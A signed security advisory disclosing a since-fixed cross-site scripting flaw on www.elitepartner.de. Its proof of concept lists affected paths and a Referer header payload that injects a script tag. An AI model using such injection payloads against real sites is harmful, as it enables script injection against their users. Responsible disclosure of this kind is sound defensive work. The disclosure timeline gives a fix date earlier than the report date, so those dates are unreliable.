-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:    www.elitepartner.de - Cross-site Scripting vulnerability
Advisory ID:    SSCHADV2012-024
Author:      Stefan Schurtz
Affected Software:  Successfully tested on www.elitepartner.de
Vendor URL:    http://www.elitepartner.de
Vendor Status:    fixed

==========================
Vulnerability Description
==========================

http://www.elitepartner.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/

Referer: '"></style></script><script>alert(/huh/)</script>

==========================
Solution
==========================

fixed

==========================
Disclosure Timeline
==========================

23-Dec-2012 - informed by contact form
10-Jan-2012 - fixed by developer

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de

iEYEARECAAYFAlDvDJQACgkQg3svV2LcbMAcOQCeLfeDdv3GZSCIR3N5XWfzfNzr
TuoAnieTg9xWXLpCkCtWe0J/A5nua7Po
=9YP0
-----END PGP SIGNATURE-----